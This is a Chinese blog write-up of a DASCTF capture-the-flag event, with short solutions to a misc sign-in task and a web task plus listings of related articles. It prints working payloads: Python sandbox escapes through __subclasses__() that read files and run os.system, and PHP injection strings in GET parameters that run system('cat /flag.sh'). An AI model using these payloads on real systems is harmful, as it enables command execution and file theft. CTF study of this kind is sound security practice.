DASCTF Oct X 吉林工师 misc web签到题wp

最新推荐文章于 2022-03-02 23:31:43 发布
最新推荐文章于 2022-03-02 23:31:43 发布
阅读量325 收藏
点赞数
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiquanmuhua/article/details/120962079
版权

DASCTF Oct X 吉林工师 misc web签到题wp

misc

WELCOME DASCTFxJlenu

nc node4.buuoj.cn 25924

本以为就是签到题(也确实是),结果试了几分钟,输入个str时输出个

<type 'str'>

感觉到这是python,直接用模板注入的方法进行文件查看,接着使用一个存在引入os模块的方法进行命令执行

# 使用<type 'file'>进行文件读取

[].__class__.__mro__[1].__subclasses__()[40]('talk.py').read()

# 使用<class 'site._Printer'>或 <class 'site.Quitter'>执行os的system方法命令执行

[].__class__.__mro__[1].__subclasses__()[71].__init__.__globals__['os'].system('ls')

flag.txt

[].__class__.__mro__[1].__subclasses__()[71].__init__.__globals__['os'].system('cat flag.txt')

giveyourflag

下载,直接拉进010,是个千层饼

直接搜504b00506

找到一串base64编码

解码交不上,仔细确认还是只有这一个地方有东西,最后看了别人的说根据flag格式猜测要凯撒解密,彳亍,是我题做少了

web

迷路的魔法少女

本地试了下,发现可以直接拼接执行

GET :?attrid[0]=a&attrvalue[0]=")-phpinfo()-("

发现什么过滤都没有

GET :?attrid[0]=a&attrvalue[0]=")-system('ls')-("

GET :?attrid[0]=a&attrvalue[0]=")-system('ls /')-("

发现flag.sh

GET :?attrid[0]=a&attrvalue[0]=")-system('cat /flag.sh')-("

#!/usr/bin/env bash 
TZ="Tokyo $FLAG" 
echo "Tokyo $FLAG" > /etc/timezone 
export FLAG=not_here 
FLAG=not_here

找到flag的位置

直接读就完事

溪泉暮花
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DASCTF Oct X 吉林工师-欢迎来到魔法世界-misc-魔法秘文(复现)
ookami6497的博客
11-09 255
下载得到一个无后缀名格式文件,结合名字推测这是一个zip格式文件,用010editor打开也能看出这是zip格式。 添加后缀名 .zip,然后解压得到一个图片文件,有文件大小有7M多,应该藏了东西在里面 放进kali中用binwalk指令看一下,可以看到最后有一个zip格式的文件 用dd命令分离一下,其中if是输入文件,of是输出文件,skip是指定从第7758998个块开始复制,bs设置每次读写块的大小为1字节 然后得到一个123.zip 里面一共有2个文件,一个flag..
2022DASCTF X SU 三月春季挑战赛——REVERSE——easyre
qq_39763436的博客
03-31 763
2022DASCTF X SU 三月春季挑战赛 反序列化之签到(easyre) 1、使用ExeinfoPe工具查看一下easyre.exe的详细信息,可以看到这个程序加了一个.aspack类型的壳; 2、使用Unpacker_ASPack工具进行自动脱壳,点击Dump,进行脱壳,并另存为; 3、使用较新版本的IDA打开,按F5进行反编译,找到main()函数后,对代码进行分析; 4、这个Destination就是我们需要的,而代码中只有这个函数sub_401771(Destination)用到
DASCTF Oct X 吉林工师 欢迎来到魔法世界~ WriteUp
七月的博客
10-26 2802
本篇文章原文:http://www.7yue.top/dasctf-oct-x-%E5%90%89%E6%9E%97%E5%B7%A5%E5%B8%88-wp/ 雪殇杯好耶,顶碗人大胜利!!! WEB 迷路的魔法少女 ?attrid=0&attrstr=${eval(system('cat /etc/timezone'))} REVERSE 魔法叠加 pyc文件,改掉了magic,首先需要修复一下 前两位是版本信息,fuzz一下可知这是python3.7的pyc文件,正常python3.7的
DASCTF Oct X 吉林工师 欢迎来到魔法世界~(魔法少女杯) web 迷路的魔法少女
llx101388627的博客
10-25 516
这场比赛全是misc,web狗卑微要饭 打开链接,可以得到源码: 我们一步步来看: 1.extract($_GET) extract函数会将函数的数据进行拆解 效果其实相当于给未声明的变量赋值,给已声明的变量则是重新赋值 如: <?php $a = "Original"; $my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse"); extract($my_array); echo "\$a = $a; \$b = $
DASCTF Oct X web
Sk1y的博客
11-16 197
文章目录Web 欢迎来到魔法世界我的解法师傅的wpMisc WELCOME DASCTFxJlenu Web 欢迎来到魔法世界 打开容器,即进行php代码审计 <?php highlight_file('index.php'); extract($_GET);//将GET方式传递的参数赋值 error_reporting(0); function String2Array($data)//eval那里存在命令执行 { if($data == '') return array(); @
电子商务师练习库.docx
12-15
电子商务师的练习库涵盖了多个关键知识点,主要涉及客户服务、网络特性、信息管理、电子商务平台类型、网络交流工具以及在线支付安全。以下是这些知识点的详细解释: 1. 客户服务的有价性:客户服务不仅是企业对...
CTF-MISC关于各类编码习(湖工商扛把子)
最新发布
03-17
在“CTF-MISC关于各类编码习(湖工商扛把子)”这个主中,你可以通过实践和解决1-1等文件中的目,进一步提升自己在编码解码方面的技能。了解和熟练掌握这些编码方式对于CTF比赛中的Misc任务至关重要,能够帮助...
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
CTF资料web型及其理论+misc日志分析
03-25
CTF资料web型及其理论+misc日志分析
2023羊城杯 DASCTF EZ-Misc
09-03
2023羊城杯 DASCTF EZ-Misc
DASCTF Oct X 吉林工师_Misc_复现
M3ng@L的博客
03-02 1410
DASCTF Oct X 吉林工师_Misc_复现WELCOME DASCTFxJlenugiveyourflag闯入魔塔的魔法少女魔法秘文不可以色色魔法信息英语不好的魔法少女彁彁魔法少女的迷音卡比卡比卡比Twinkle Twinkle Starry Night Perference:Perference:Perference: (11条消息) DASCTF Oct X 吉林工师 欢迎来到魔法世界~ WriteUp_七月的博客-CSDN博客 WELCOME DASCTFxJlenu keywords:key
DASCTF Oct X 吉林工师 欢迎来到魔法世界 部分wp
weixin_44088994的博客
11-21 2985
存一下(呜呜呜菜狗就是菜狗wp都看不懂 参考:七月大佬DASCTF Oct X 吉林工师 欢迎来到魔法世界~ WP – 七月的摸鱼历程 魔法密文 Writeup| DASCTF Oct X 吉林工师_张麦麦的博客 zhangmaimai.com-CSDN博客 DASCTF Oct X 吉林工师 欢迎来到魔法世界~(魔法少女杯) web 迷路的魔法少女_llx101388627的博客-CSDN博客 签到 1.give you flag 2.闯入魔塔的魔法少女 3.魔法信息 4.魔法秘文 5.卡比卡比
DASCTF Oct X 吉林工师-欢迎来到魔法世界-misc-giveyourflag
ookami6497的博客
10-25 520
唯一写出的就这送分了。。 下载文件,拿到010editor中打开,看到是个压缩包格式,也就压缩了1000遍。。。 手动解了三次发现不行,想着flag应该是放在最后一个压缩包里面的,每次取出头部和尾部,最后的压缩包就是在中间部分。(ZIP格式文件头以50400304 开头,以504B0506结尾) 找到最后一个504B0304开头的部分,这里就是最后的压缩包了,其实这里已经能看到flag了,一串base64加密的字符串 把这部分代码复制出来,另存为zip格式的文件 解压得到fla.
DASCTF Oct X 吉林工师-欢迎来到魔法世界-misc-闯入魔塔的魔法少女
ookami6497的博客
10-26 2033
下载后得到一个后缀名为swf的文件,可以使用浏览器来打开 运行后发现是一个游戏,打开swf文件可以参考这个 逆向SWF文件需要使用 JPEXS flash 反编译工具 这里有swf的各种文件,点开各个文件看看,看到这句 直接在tools中搜索flag 发现这是一个很长的文本,,这个RPG游戏肯定把flag放在了对话中,所以一直往右边翻就行 得到flag:DASCTF{23dvkjzr3juboiavztbncaxftfpyq5gz} ...
菜鸡的DASCTF Sept X 浙江工业大学秋季挑战赛WP
克格莫
09-25 1275
1.签到 目: #!/usr/bin/env python # -*- coding: utf-8 -*- from Crypto.Util.number import * import random flag=b'flag{******************}' n = 2 ** 256 e=bytes_to_long(flag) m = random.randint(2, n-1) | 1 c = pow(m, e, n) #m mod(e)n print('m = ' + str(m)) prin
魔法密文 Writeup| DASCTF Oct X 吉林工师
张麦麦
10-28 412
魔法秘文 这思路还好吧……但是真的属于把我做吐了的那种……具体见后文 首先给了一个zip文件,解压出来一张魔法少女.png,通过binwalk分析出来隐藏了压缩包。 直接用binwalk -e分离发现压缩包大小有问。 于是使用 hex 编辑器直接删掉了前面的图片部分,得到一个压缩包。 压缩包中有两个文件,flag.txt是加密的,魔法萝莉简体未加密。 提示内容为:密码为32位中文。 解压出来魔法萝莉简体,在hex视图下,字体文件末尾发现一串 urlcode 编码的字符。 urldecode后得到如
2021 DASCTF July X CBCTF 4th/web/cat flag
Demonering的博客
08-16 380
目源码: <?php if (isset($_GET['cmd'])) { $cmd = $_GET['cmd']; if (!preg_match('/flag/i',$cmd)) { $cmd = escapeshellarg($cmd); system('cat ' . $cmd); } } else { highlight_file(__FILE__); } ?> 知识点: 1.绕过正则 2.escap
2020 DASCTF四月春季战-misc
weixin_43952190的博客
04-26 1905
misc 0x01 签到 5G都来了,6G还远吗?6G下还需要开会员才能高速下载吗?请提交 DASCTF{} 里的内容。 下载发现有将近1G。作为签到应该不需要这样做。 按下F12,接收到payload。 payload如下: REFTQ1RGe3dlbGNvbWVfdG9fREFTX0FwMXIxfc9Vo4jQqwH4ON+olEgxiijIjbgcdJur4VZjq9WlhUI...
工业互联网安全misc wp
10-27
工业互联网安全是指保护工业互联网系统免受各类恶意攻击和数据泄露的安全措施。随着工业互联网的快速发展,工业互联网安全问日益突出,需要采取有效措施确保系统的可靠性和稳定性。 首先,工业互联网安全需要进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值